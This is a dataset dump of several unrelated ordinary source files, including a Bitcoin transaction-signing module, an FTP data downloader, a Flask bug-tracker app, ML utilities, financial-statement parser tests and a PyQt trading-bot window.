\"\"\"\n Creates payload needed in order to access metadata related to roles\n :param: \n :return: \n \"\"\"\n @staticmethod\n def create_payload():\n return {\n \"grant_type\": \"client_credentials\",\n \"client_id\": os.environ['AUTH0_MANAGEMENT_ID'],\n \"client_secret\": os.environ['AUTH0_MANAGEMENT_SECRET'],\n \"audience\": builtins.environment_config[builtins.study_id][builtins.environment][\n 'auth0_url'] + \"/api/v2/\"\n }\n","sub_path":"common/auth0_connector.py","file_name":"auth0_connector.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"244926111","text":"import logging\nfrom collections import namedtuple\nfrom itertools import islice\nimport re\n\nfrom bit.crypto import double_sha256, sha256\nfrom bit.exceptions import InsufficientFunds\nfrom bit.format import address_to_public_key_hash, TEST_SCRIPT_HASH, MAIN_SCRIPT_HASH\nfrom bit.network.rates import currency_to_satoshi_cached\nfrom bit.utils import (\n bytes_to_hex, chunk_data, hex_to_bytes, int_to_unknown_bytes, int_to_varint, script_push, get_signatures_from_script\n)\n\nfrom bit.format import verify_sig\nfrom bit.base58 import b58decode_check\n\nVERSION_1 = 0x01.to_bytes(4, byteorder='little')\nSEQUENCE = 0xffffffff.to_bytes(4, byteorder='little')\nLOCK_TIME = 0x00.to_bytes(4, byteorder='little')\nHASH_TYPE = 0x01.to_bytes(4, byteorder='little')\n\nOP_0 = b'\\x00'\nOP_CHECKLOCKTIMEVERIFY = b'\\xb1'\nOP_CHECKSIG = b'\\xac'\nOP_DUP = b'v'\nOP_EQUALVERIFY = b'\\x88'\nOP_HASH160 = b'\\xa9'\nOP_PUSH_20 = b'\\x14'\nOP_RETURN = b'\\x6a'\nOP_EQUAL = b'\\x87'\n\nMESSAGE_LIMIT = 40\n\n\nclass TxIn:\n __slots__ = ('script', 'script_len', 'txid', 'txindex', 'sequence')\n\n def __init__(self, script, txid, txindex, sequence=SEQUENCE):\n self.script = script\n self.script_len = int_to_varint(len(script))\n self.txid = txid\n self.txindex = txindex\n self.sequence = sequence\n\n def __eq__(self, other):\n return (self.script == other.script and\n self.script_len == other.script_len and\n self.txid == other.txid and\n self.txindex == other.txindex and\n self.sequence == other.sequence)\n\n def __repr__(self):\n return 'TxIn({}, {}, {}, {}, {})'.format(\n repr(self.script),\n repr(self.script_len),\n repr(self.txid),\n repr(self.txindex),\n repr(self.sequence)\n )\n\n\nOutput = namedtuple('Output', ('address', 'amount', 'currency'))\n\n\nclass TxOut:\n __slots__ = ('value', 'script_len', 'script')\n\n def __init__(self, value, script):\n self.value = value\n self.script = script\n self.script_len = int_to_varint(len(script))\n\n def __eq__(self, other):\n return (self.value == other.value and\n self.script == other.script and\n self.script_len == other.script_len)\n\n def __repr__(self):\n return 'TxOut({}, {}, {})'.format(\n repr(self.value),\n repr(self.script),\n repr(self.script_len)\n )\n\n\nclass TxObj:\n __slots__ = ('version', 'TxIn', 'input_count', 'TxOut', 'output_count', 'locktime')\n\n def __init__(self, version, TxIn, TxOut, locktime):\n self.version = version\n self.TxIn = TxIn\n self.input_count = len(TxIn)\n self.TxOut = TxOut\n self.output_count = len(TxOut)\n self.locktime = locktime\n\n def __eq__(self, other):\n return (self.version == other.version and\n self.TxIn == other.TxIn and\n self.input_count == other.input_count and\n self.TxOut == other.TxOut and\n self.output_count == other.output_count and\n self.locktime == other.locktime)\n\n def __repr__(self):\n return 'TxObj({}, {}, {}, {})'.format(\n repr(self.version),\n repr(self.TxIn),\n repr(self.TxOut),\n repr(self.locktime)\n )\n\n\ndef calc_txid(tx_hex):\n return bytes_to_hex(double_sha256(hex_to_bytes(tx_hex))[::-1])\n\n\ndef estimate_tx_fee(n_in, n_out, satoshis, compressed):\n\n if not satoshis:\n return 0\n\n estimated_size = (\n n_in * (148 if compressed else 180)\n + len(int_to_unknown_bytes(n_in, byteorder='little'))\n + n_out * 34\n + len(int_to_unknown_bytes(n_out, byteorder='little'))\n + 8\n )\n\n estimated_fee = estimated_size * satoshis\n\n logging.debug('Estimated fee: {} satoshis for {} bytes'.format(estimated_fee, estimated_size))\n\n return estimated_fee\n\n\ndef deserialize(txhex):\n if isinstance(txhex, str) and re.match('^[0-9a-fA-F]*$', txhex):\n #return deserialize(binascii.unhexlify(txhex))\n return deserialize(hex_to_bytes(txhex))\n\n pos = [0]\n\n def read_as_int(bytez):\n pos[0] += bytez\n return int(bytes_to_hex(txhex[pos[0]-bytez:pos[0]][::-1]), base=16)\n\n def read_var_int():\n pos[0] += 1\n\n val = int(bytes_to_hex(txhex[pos[0]-1:pos[0]]), base=16)\n if val < 253:\n return val\n return read_as_int(pow(2, val - 252))\n\n def read_bytes(bytez):\n pos[0] += bytez\n return txhex[pos[0]-bytez:pos[0]]\n\n def read_var_string():\n size = read_var_int()\n return read_bytes(size)\n\n version = read_as_int(4).to_bytes(4, byteorder='little')\n\n ins = read_var_int()\n inputs = []\n for _ in range(ins):\n txid = read_bytes(32)\n txindex = read_as_int(4).to_bytes(4, byteorder='little')\n script = read_var_string()\n sequence = read_as_int(4).to_bytes(4, byteorder='little')\n inputs.append(TxIn(script, txid, txindex, sequence))\n\n outs = read_var_int()\n outputs = []\n for _ in range(outs):\n value = read_as_int(8).to_bytes(8, byteorder='little')\n script = read_var_string()\n outputs.append(TxOut(value, script))\n\n locktime = read_as_int(4).to_bytes(4, byteorder='little')\n\n txobj = TxObj(version, inputs, outputs, locktime)\n\n return txobj\n\n\ndef sanitize_tx_data(unspents, outputs, fee, leftover, combine=True, message=None, compressed=True):\n \"\"\"\n sanitize_tx_data()\n\n fee is in satoshis per byte.\n \"\"\"\n\n outputs = outputs.copy()\n\n for i, output in enumerate(outputs):\n dest, amount, currency = output\n outputs[i] = (dest, currency_to_satoshi_cached(amount, currency))\n\n if not unspents:\n raise ValueError('Transactions must have at least one unspent.')\n\n # Temporary storage so all outputs precede messages.\n messages = []\n\n if message:\n message_chunks = chunk_data(message.encode('utf-8'), MESSAGE_LIMIT)\n\n for message in message_chunks:\n messages.append((message, 0))\n\n # Include return address in output count.\n num_outputs = len(outputs) + len(messages) + 1\n sum_outputs = sum(out[1] for out in outputs)\n\n total_in = 0\n\n if combine:\n # calculated_fee is in total satoshis.\n calculated_fee = estimate_tx_fee(len(unspents), num_outputs, fee, compressed)\n total_out = sum_outputs + calculated_fee\n unspents = unspents.copy()\n total_in += sum(unspent.amount for unspent in unspents)\n\n else:\n unspents = sorted(unspents, key=lambda x: x.amount)\n\n index = 0\n\n for index, unspent in enumerate(unspents):\n total_in += unspent.amount\n calculated_fee = estimate_tx_fee(len(unspents[:index + 1]), num_outputs, fee, compressed)\n total_out = sum_outputs + calculated_fee\n\n if total_in >= total_out:\n break\n\n unspents[:] = unspents[:index + 1]\n\n remaining = total_in - total_out\n\n if remaining > 0:\n outputs.append((leftover, remaining))\n elif remaining < 0:\n raise InsufficientFunds('Balance {} is less than {} (including '\n 'fee).'.format(total_in, total_out))\n\n outputs.extend(messages)\n\n return unspents, outputs\n\n\ndef construct_outputs(outputs):\n outputs_obj = []\n\n for data in outputs:\n dest, amount = data\n\n # P2SH\n if amount and (b58decode_check(dest)[0:1] == MAIN_SCRIPT_HASH or \n b58decode_check(dest)[0:1] == TEST_SCRIPT_HASH):\n script = (OP_HASH160 + OP_PUSH_20 +\n address_to_public_key_hash(dest) +\n OP_EQUAL)\n\n amount = amount.to_bytes(8, byteorder='little')\n\n # P2PKH\n elif amount:\n script = (OP_DUP + OP_HASH160 + OP_PUSH_20 +\n address_to_public_key_hash(dest) +\n OP_EQUALVERIFY + OP_CHECKSIG)\n\n amount = amount.to_bytes(8, byteorder='little')\n\n # Blockchain storage\n else:\n script = (OP_RETURN +\n len(dest).to_bytes(1, byteorder='little') +\n dest)\n\n amount = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n outputs_obj.append(TxOut(amount, script))\n\n return outputs_obj\n\n\ndef construct_input_block(inputs):\n\n input_block = b''\n sequence = SEQUENCE\n\n for txin in inputs:\n input_block += (\n txin.txid +\n txin.txindex +\n txin.script_len +\n txin.script +\n sequence\n )\n\n return input_block\n\ndef sign_legacy_tx(private_key, tx, j=-1):\n# j is the input to be signed and can be a single index, a list of indices, or denote all inputs (-1)\n\n if not isinstance(tx, TxObj):\n tx = deserialize(tx)\n\n version = tx.version\n lock_time = tx.locktime\n hash_type = HASH_TYPE\n\n input_count = int_to_varint(tx.input_count)\n output_count = int_to_varint(tx.output_count)\n\n output_block = b''\n for i in range(tx.output_count):\n output_block += tx.TxOut[i].value\n output_block += tx.TxOut[i].script_len\n output_block += tx.TxOut[i].script\n\n inputs = tx.TxIn\n\n if j<0:\n j = range(len(inputs))\n elif not isinstance(j, list):\n j = [j]\n\n for i in j:\n\n public_key = private_key.public_key\n public_key_len = script_push(len(public_key))\n\n scriptCode = private_key.scriptcode\n scriptCode_len = int_to_varint(len(scriptCode))\n\n hashed = sha256(\n version +\n input_count +\n b''.join(ti.txid + ti.txindex + OP_0 + ti.sequence\n for ti in islice(inputs, i)) +\n inputs[i].txid +\n inputs[i].txindex +\n scriptCode_len +\n scriptCode +\n inputs[i].sequence +\n b''.join(ti.txid + ti.txindex + OP_0 + ti.sequence\n for ti in islice(inputs, i + 1, None)) +\n output_count +\n output_block +\n lock_time +\n hash_type\n )\n\n signature = private_key.sign(hashed) + b'\\x01'\n\n # ------------------------------------------------------------------\n if private_key.instance == 'MultiSig' or private_key.instance == 'MultiSigTestnet':\n\n script_blob = b''\n sigs = {}\n if tx.TxIn[i].script: # If tx is already partially signed: Make a dictionary of the provided signatures with public-keys as key-values\n sig_list = get_signatures_from_script(tx.TxIn[i].script)\n if len(sig_list) > private_key.m:\n raise TypeError('Transaction is already signed with {} of {} needed signatures.').format(len(sig_list), private_key.m)\n for sig in sig_list:\n for pub in private_key.public_keys:\n if verify_sig(sig[:-1], hashed, hex_to_bytes(pub)):\n sigs[pub] = sig\n script_blob += b'\\x00' * (private_key.m - len(sig_list)-1) # Bitcoin Core convention: Every missing signature is denoted by 0x00. Only used for already partially-signed scriptSigs.\n\n sigs[bytes_to_hex(public_key)] = signature\n\n script_sig = b'' # P2SH - Multisig\n for pub in private_key.public_keys: # Sort the signatures according to the public-key list:\n if pub in sigs:\n sig = sigs[pub]\n length = script_push(len(sig))\n script_sig += length + sig\n\n script_sig = b'\\x00' + script_sig + script_blob\n script_sig += script_push(len(private_key.redeemscript)) + private_key.redeemscript\n\n # ------------------------------------------------------------------\n else:\n script_sig = ( # P2PKH\n len(signature).to_bytes(1, byteorder='little') +\n signature +\n public_key_len +\n public_key\n )\n\n inputs[i].script = script_sig\n inputs[i].script_len = int_to_varint(len(script_sig))\n\n return bytes_to_hex(\n version +\n input_count +\n construct_input_block(inputs) +\n output_count +\n output_block +\n lock_time\n )\n\n\ndef create_new_transaction(private_key, unspents, outputs):\n\n version = VERSION_1\n lock_time = LOCK_TIME\n outputs = construct_outputs(outputs)\n\n # Optimize for speed, not memory, by pre-computing values.\n inputs = []\n for unspent in unspents:\n script = b'' # empty scriptSig for new unsigned transaction.\n txid = hex_to_bytes(unspent.txid)[::-1]\n txindex = unspent.txindex.to_bytes(4, byteorder='little')\n\n inputs.append(TxIn(script, txid, txindex))\n\n tx_unsigned = TxObj(version, inputs, outputs, lock_time)\n\n tx = sign_legacy_tx(private_key, tx_unsigned)\n return tx\n","sub_path":"bit/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":13016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"439506091","text":"#!/usr/bin/python3\r\n# coding=utf-8\r\n# author: 左懒\r\n\r\nfrom PIL import Image\r\n\r\ncolor = '*&HQ$OC?7>!:-;.'\r\n\r\n\r\ndef make_char_image(image):\r\n pixel = image.load()\r\n picture_chars = ''\r\n width, height = image.size\r\n for h in range(0, height):\r\n for w in range(0, width):\r\n picture_chars += color[int(int(pixel[w, h]) * 14 / 255)]\r\n picture_chars += '\\n'\r\n return picture_chars\r\n\r\n\r\ndef preprocess(image_path):\r\n image = Image.open(image_path)\r\n width, height = image.size\r\n m = max(image.size)\r\n delta = m / 200.0\r\n width, height = int(width / delta), int(height / delta)\r\n image = image.resize((width, height))\r\n image = image.convert('L')\r\n return image\r\n\r\n\r\nimage = preprocess('1.jpg')\r\nchars = make_char_image(image)\r\nfp = open('2.txt', 'w')\r\nfp.write(chars)\r\nfp.close()\r\n","sub_path":"convi.py","file_name":"convi.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"80625530","text":"__author__ = \"Koech Nicholas\"\n__copyright__ = \"Copyright 2018\"\n__email__ = \"koechnicholas@gmail.com\"\n__status__ = \"draft\"\n\nfrom contextlib import closing\nfrom datetime import datetime\nimport ftplib\nimport os\nimport re\nimport sys\nimport urlparse\n\n\ndef _is_item_dir(ftp_handle, item, param):\n \"\"\"Checks if an item is directory or file\"\"\"\n if param['extension']:\n if len(item.rsplit('/', 1)[-1]) >= 4:\n if item[-3:] == param['extension'] or item[-4:] == param['extension']:\n return False\n original_cwd = ftp_handle.pwd()\n try:\n ftp_handle.cwd(item) # Try to change to the new directory\n ftp_handle.cwd(original_cwd) # Set cwd to the original working directory\n return True\n except:\n return False\n\ndef _is_int (str):\n \"\"\"Check if string is an integer\"\"\"\n try:\n int(str)\n return True\n except ValueError:\n return False\n\ndef _set_path(ftp_path, param):\n \"\"\"Create local paths\"\"\"\n ftp_items = ftp_path.split('/')\n region = param['region'] + '_'\n product = [region + i for i in param['product'] if region + i in ftp_items]\n idx = ftp_items.index(product[0])\n dest_dir = os.path.join(param['dest'], '/'.join(ftp_items[idx:-1])).replace('\\\\', '/')\n dest_file = os.path.join(param['dest'], '/'.join(ftp_items[idx:])).replace('\\\\', '/')\n return dest_dir, dest_file\n\ndef _make_parent_dir(fpath):\n \"\"\"Creates parent directory if it does not exist\"\"\"\n dir_name = fpath\n while not os.path.exists(dir_name):\n try:\n os.makedirs(dir_name)\n print(\"Created: {0}\".format(dir_name))\n except:\n _make_parent_dir(dir_name)\n\ndef _download_ftp_file(ftp_handle, ftp_path, param):\n \"\"\"Download a single file from FTP server \"\"\" \n dest_dir, dest_file = _set_path(ftp_path, param) \n _make_parent_dir(dest_dir) \n if not os.path.exists(dest_file):\n try:\n with open(dest_file, 'wb') as f:\n ftp_handle.retrbinary(\"RETR {0}\".format(ftp_path), f.write)\n print(\"Downloaded: {0}\".format(dest_file))\n except IOError:\n print(\"FAILED: {0}\".format(dest_file))\n else:\n print(\"already exists: {0}\".format(dest_file))\n\ndef _format_date(raw_date):\n \"\"\"Format date into year, month and day\"\"\"\n date = []\n for c, v in enumerate(raw_date):\n if c > 0 and len(v) >= 3:\n for i in range(0, len(v), 2):\n date.append(int(v[i:i + 2]))\n else:\n date.append(int(v))\n ln = len(date)\n if ln == 3:\n return {'year': date[0], 'month': date[1], 'date': date[2]}\n elif ln == 2:\n return {'year': date[0], 'month': date[1]}\n else:\n return {'year': date[0]}\n\ndef _get_date(ftp_path, years):\n \"\"\"Get file date as digits\"\"\"\n f_name = ftp_path.rsplit('/', 1)[-1]\n f_name = f_name.split('.')\n for c, v in enumerate(f_name):\n if _is_int(v):\n if int(v) in years:\n raw_date = [i for i in f_name[c:] if _is_int(i)]\n return _format_date(raw_date)\n\ndef _filter_ftp_file(ftp_handle, ftp_path, param):\n \"\"\" Get valid file and download \"\"\"\n num_years = [datetime.today().year - i for i in xrange(49)] # number of years to be compared with\n date = _get_date(ftp_path, num_years) # get file date\n param_keys = [k for k, v in param.items() if v and k in ('year', 'month', 'date')] # user dates with values \n if param_keys and date:\n param_date_keys = [k for k in param_keys if k in date.keys()]\n matched_keys = [k for k, v in date.items() if k in param_keys and v in param[k]] # Matched keys\n if len(param_keys) >= len(date) and len(date) == len(matched_keys):\n _download_ftp_file(ftp_handle, ftp_path, param)\n elif len(date) > len(param_keys) and len(param_date_keys) == len(matched_keys):\n _download_ftp_file(ftp_handle, ftp_path, param)\n\ndef _mirror_ftp_dir(ftp_handle, ftp_path, param):\n \"\"\"Replicates a directory on an ftp server recursively\"\"\"\n for item in ftp_handle.nlst(ftp_path):\n if _is_item_dir(ftp_handle, item, param):\n if param['year']:\n product_year = item.rsplit('/', 1)[-1]\n if _is_int(product_year) and int(product_year) in param['year']:\n _mirror_ftp_dir(ftp_handle, item, param) \n else:\n _mirror_ftp_dir(ftp_handle, item, param)\n else:\n _filter_ftp_file(ftp_handle, item, param) # get valid file and download\n\ndef _download_ftp_tree(ftp_url, param):\n \"\"\"List and download files\"\"\"\n with closing(ftplib.FTP(urlparse.urlsplit(ftp_url).netloc)) as ftp:\n try:\n ftp.login()\n ftp_path = urlparse.urlsplit(ftp_url).path.lstrip('/')\n _mirror_ftp_dir(ftp, ftp_path, param)\n except ftplib.all_errors as e:\n print('FTP error:', e)\n\ndef _generate_list(param):\n \"\"\"Generate integer values from range of values\"\"\"\n keys = ['year', 'month', 'date']\n for k in keys:\n if k in param.keys() and param[k]:\n for lst in list(param[k]): # Copy original list for removal on iteration \n if not _is_int(lst): \n boundary_vals = map(int, lst.split('-'))\n param[k].remove(lst)\n param[k].extend(list(range(min(boundary_vals), max(boundary_vals) + 1)))\n\ndef ftp_download(param):\n \"\"\" Set the right product URL and downlaod \"\"\"\n base_url = param['base_url'].strip('/') + '/'\n _generate_list(param)\n if param['region']:\n region_url = urlparse.urljoin(base_url, param['region'].strip('/'))\n if param['product']:\n for i in param['product']:\n url = region_url + '_' + i + '/'\n if i == 'daily':\n product_url = urlparse.urljoin(url, 'tifs/p05/') \n else:\n product_url = urlparse.urljoin(url, 'tifs/')\n _download_ftp_tree(product_url, param)\n else:\n product_url = urlparse.urljoin(region_url + '_daily/', 'tifs/p05/') # Daily product used as default\n param['product'] = 'daily'\n _download_ftp_tree(product_url, param) \n else:\n print('Region is not set. Please include it in the .json file.')\n","sub_path":"Python Scripts/CHIRPS_Processor/ftpdownload.py","file_name":"ftpdownload.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"456462173","text":"\"\"\"\ncheck the username and QQ number\n\"\"\"\n\nimport re\n\n\ndef main():\n username = input('Pls input the username:')\n qq = input('Pls input the QQ number:')\n # the first Arg of match is re expr\n # the second Arg is the string to be matched\n m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username)\n if not m1:\n print('Pls input a valid username.')\n m2 = re.match(r'^[1-9]\\d{4,11}$', qq)\n if not m2:\n print('Pls input a valid QQ num.')\n if m1 and m2:\n print('your input is valid.')\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"Day01-15/code/Day12/test_str1.py","file_name":"test_str1.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"519146141","text":"def test(arr):\n first_positive = len(arr)\n for i in range(0,len(arr)):\n if arr[i]>=0:\n first_positive = i\n break\n for i in range(first_positive,len(arr)):\n if arr[i]<0:\n print(\"False\")\n return\n print(\"True\")\n\n\ndef test_1():\n arr1 = [1,-2,3,-7,0]\n test(split(arr1))\n arr2 = [-1,2,-3]\n test(split(arr2))\n arr3 = [-1, -2, -3]\n test(split(arr3))\n arr4 = [1, 2, 3]\n test(split(arr4))\n arr5 = [1,2,3,-1,-2,-3,4]\n test(split(arr5))\n\ndef split_1(arr1):\n for i in range(0,len(arr1)):\n for j in range(i+1,len(arr1)):\n if arr1[i] > arr1[j] and arr1[j]<0:\n temp =arr1[i]\n arr1[i] = arr1[j]\n arr1[j] = temp\n return(arr1)\n\ndef split(arr1):\n mini = min(arr1)\n maxi = max(arr1)\n temp = 0\n if mini >= 0 or maxi < 0:\n return (arr1)\n j = len(arr1) - 1\n k = 0\n for i in range(1,(len(arr1)-1)):\n if arr1[i]<0:\n temp = arr1[i]\n arr1[i] = arr1[k]\n arr1[k] = temp\n k = k + 1\n else:\n temp = arr1[i]\n arr1[i] = arr1[j]\n arr1[j] = temp\n j = j - 1\n return arr1\n\n\n\n\n\ntest_1()","sub_path":"split_positive_negative.py","file_name":"split_positive_negative.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514234196","text":"#import httplib2\nimport requests, json, flask\nfrom launchpad.release_chart import ReleaseChart\nfrom launchpad.lpdata import LaunchpadData\n\n#httplib2.debuglevel = 1\n\napp = flask.Flask(__name__)\nlpdata = LaunchpadData()\n\n@app.route('/project//bug_table_for_status//')\ndef bug_table_for_status(project_name, bug_type, milestone_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"bug_table.html\", project=project)\n\n@app.route('/project//bug_table_for_status///bug_list')\ndef bug_list(project_name, bug_type, milestone_name):\n project = lpdata.get_project(project_name)\n tags = None\n if 'tags' in flask.request.args:\n tags = flask.request.args['tags'].split(',')\n bugs = lpdata.get_bugs(project_name, LaunchpadData.BUG_STATUSES[bug_type], milestone_name, tags)\n return flask.render_template(\"bug_list.html\", project=project, bugs=bugs, bug_type=bug_type, milestone_name=milestone_name, selected_bug_table=True)\n\n@app.route('/project/')\ndef project_overview(project_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"project.html\", project=project, selected_overview=True)\n\n@app.route('/project//bug_trends/')\ndef bug_trends(project_name, milestone_name):\n project = lpdata.get_project(project_name)\n return flask.render_template(\"bug_trends.html\", project=project, milestone_name=milestone_name, selected_bug_trends=True)\n\n@app.route('/project//api/release_chart_trends//get_data')\ndef bug_report_trends_data(project_name, milestone_name):\n data = ReleaseChart(lpdata, project_name, milestone_name).get_trends_data()\n return flask.json.dumps(data)\n\n@app.route('/project//api/release_chart_incoming_outgoing//get_data')\ndef bug_report_get_incoming_outgoing_data(project_name, milestone_name):\n data = ReleaseChart(lpdata, project_name, milestone_name).get_incoming_outgoing_data()\n return flask.json.dumps(data)\n\n@app.route('/')\ndef main_page():\n return flask.redirect(flask.url_for(\"project_overview\", project_name=\"fuel\"))\n\nif __name__ == \"__main__\":\n app.run(host = \"0.0.0.0\", port = 4444, threaded = True, debug = True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536780904","text":"\"\"\"General utility functions\"\"\"\n# ToDo(Andrew): Fininsh implementing Params class\nimport json\nimport logging\n\ndef _preprocess_numpy_input(x, data_format, mode):\n \"\"\"Preprocesses a Numpy array encoding a batch of images.\n\n Arguments:\n x: Input array, 3D or 4D.\n data_format: Data format of the image array.\n mode: One of \"caffe\", \"tf\" or \"torch\".\n - caffe: will convert the images from RGB to BGR,\n then will zero-center each color channel with\n respect to the ImageNet dataset,\n without scaling.\n - tf: will scale pixels between -1 and 1,\n sample-wise.\n - torch: will scale pixels between 0 and 1 and then\n will normalize each channel with respect to the\n ImageNet dataset.\n\n Returns:\n Preprocessed Numpy array.\n \"\"\"\n if mode == 'tf':\n x /= 127.5\n x -= 1.\n return x\n\n if mode == 'torch':\n x /= 255.\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n else:\n if data_format == 'channels_first':\n # 'RGB'->'BGR'\n if x.ndim == 3:\n x = x[::-1, ...]\n else:\n x = x[:, ::-1, ...]\n else:\n # 'RGB'->'BGR'\n x = x[..., ::-1]\n mean = [103.939, 116.779, 123.68]\n std = None\n\n # Zero-center by mean pixel\n if data_format == 'channels_first':\n if x.ndim == 3:\n x[0, :, :] -= mean[0]\n x[1, :, :] -= mean[1]\n x[2, :, :] -= mean[2]\n if std is not None:\n x[0, :, :] /= std[0]\n x[1, :, :] /= std[1]\n x[2, :, :] /= std[2]\n else:\n x[:, 0, :, :] -= mean[0]\n x[:, 1, :, :] -= mean[1]\n x[:, 2, :, :] -= mean[2]\n if std is not None:\n x[:, 0, :, :] /= std[0]\n x[:, 1, :, :] /= std[1]\n x[:, 2, :, :] /= std[2]\n else:\n x[..., 0] -= mean[0]\n x[..., 1] -= mean[1]\n x[..., 2] -= mean[2]\n if std is not None:\n x[..., 0] /= std[0]\n x[..., 1] /= std[1]\n x[..., 2] /= std[2]\n return x\n\n\nclass Params():\n \"\"\"Class that loads hyperparameters from json file\"\n \n Example: \n ```\n params = Params(json_path)\n print(params.learning_rate)\n params.learning_rate = 0.5# change the value of learning_rate in params\n ```\n \"\"\"\n\n def __init__(self,json_path):\n self.update(json_path)\n\n def save(self,json_path):\n \"\"\"Saves parameters to json file\"\"\"\n with open(json_path,'w') as f:\n json.dump(self.__dict__,f,indent=4)\n \n def update(self,json_path):\n \"\"\" Loads parameters from json file\"\"\"\n with open(json_path) as f:\n params=json.load(f)\n self.__dict__.update(params)\n\n\n @property\n def dict(self):\n \"\"\"Gives dict-like access to Params instance by `params.dict`['learning_rate']\"\"\"\n return self.__dict__\n\ndef set_logger(log_path):\n \"\"\"Sets the logger to log info in terminal and file `log_path`\n \n In general, it is useful to have a logger so that every output to the terminal\n is saved in a permanent file. Here we save it to model_dir/train.log\n\n Example:\n ```\n logging.info(\"Starting training...\")\n ```\n\n Args:\n log_path: (string) where to log\n\n \"\"\"\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if not logger.handlers:\n # Logging to a file\n file_handler = logging.FileHandler(log_path)\n file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n logger.addHandler(file_handler)\n\n # Logging to console\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter('%(message)s'))\n\n\ndef save_dict_to_json(d,json_path):\n \"\"\"Saves dict of floats in json file\n \n Args:\n d: (dict) of floating-castable values(np.float,int,float,etc.)\n json_path: (string) path to json file\n \"\"\"\n with open(json_path,'w') as f:\n # We need to convert the values to float for json\n # (it does not accept np.array, np.float)\n d={k:float(v) for k,v in d.items()}\n json.dump(d,f,indent=4)\n\n\n ","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"476672727","text":"import os\nimport json\nfrom datetime import date\nimport pandas as pd\nfrom pyfinmod.financials import Financials\n\nraw_data_dir = os.path.join(os.path.dirname(__file__), 'raw_data')\n\n\ndef test_date_parser():\n assert Financials._date_parse(\"2018-9-29\") == date(2018, 9, 29)\n\n\ndef test_get_balance_sheet():\n parser = Financials(\"AAPL\")\n with open(os.path.join(raw_data_dir, \"aapl_balance_sheet.json\"), \"r\") as f:\n json_data = json.load(f)\n\n parser._fetch_json = lambda x: {\"financials\": json_data}\n\n df = parser.balance_sheet_statement\n assert not df.empty\n\n df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_balance_sheet.hdf\"), key=\"aapl_balance_sheet\")\n assert df.equals(df_test)\n\n\ndef test_get_income_statement():\n parser = Financials(\"AAPL\")\n with open(os.path.join(raw_data_dir, \"aapl_income_statement.json\"), \"r\") as f:\n json_data = json.load(f)\n parser._fetch_json = lambda x: json_data\n\n df = parser.income_statement\n assert not df.empty\n\n df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_income_statement.hdf\"), key=\"aapl_income_statement\")\n assert df.equals(df_test)\n\n\ndef test_get_cash_flow():\n parser = Financials(\"AAPL\")\n with open(os.path.join(raw_data_dir, \"aapl_cash_flow.json\"), \"r\") as f:\n json_data = json.load(f)\n parser._fetch_json = lambda x: json_data\n\n df = parser.cash_flow_statement\n assert not df.empty\n\n df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_cash_flow.hdf\"), key=\"aapl_cash_flow\")\n assert df.equals(df_test)\n\n\ndef test_get_market_cap():\n parser = Financials(\"AAPL\")\n parser._fetch_json(\"profile\")\n with open(os.path.join(raw_data_dir, \"aapl_summary.json\"), \"r\") as f:\n json_data = json.load(f)\n parser._fetch_json = lambda x: json_data\n mktCap = parser.mktCap\n assert mktCap == float(1230468047640.00)\n","sub_path":"tests/test_financials_parser.py","file_name":"test_financials_parser.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"356160055","text":"import time\nimport webbrowser\nfrom threading import Thread\n\nfrom dexbot import __version__\nfrom dexbot.config import Config\nfrom dexbot.controllers.wallet_controller import WalletController\nfrom dexbot.qt_queue.idle_queue import idle_add\nfrom dexbot.qt_queue.queue_dispatcher import ThreadDispatcher\nfrom dexbot.views.create_wallet import CreateWalletView\nfrom dexbot.views.create_worker import CreateWorkerView\nfrom dexbot.views.errors import gui_error\nfrom dexbot.views.layouts.flow_layout import FlowLayout\nfrom dexbot.views.settings import SettingsView\nfrom dexbot.views.ui.worker_list_window_ui import Ui_MainWindow\nfrom dexbot.views.unlock_wallet import UnlockWalletView\nfrom dexbot.views.worker_item import WorkerItemWidget\nfrom grapheneapi.exceptions import NumRetriesReached\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QFontDatabase\nfrom PyQt5.QtWidgets import QMainWindow\n\n\nclass MainView(QMainWindow, Ui_MainWindow):\n def __init__(self, main_controller):\n super().__init__()\n self.setupUi(self)\n self.main_controller = main_controller\n\n self.config = main_controller.config\n self.max_workers = 10\n self.num_of_workers = 0\n self.worker_widgets = {}\n self.closing = False\n self.status_bar_updater = None\n self.statusbar_updater_first_run = True\n self.main_controller.set_info_handler(self.set_worker_status)\n self.layout = FlowLayout(self.scrollAreaContent)\n self.dispatcher = None\n\n # GUI buttons\n 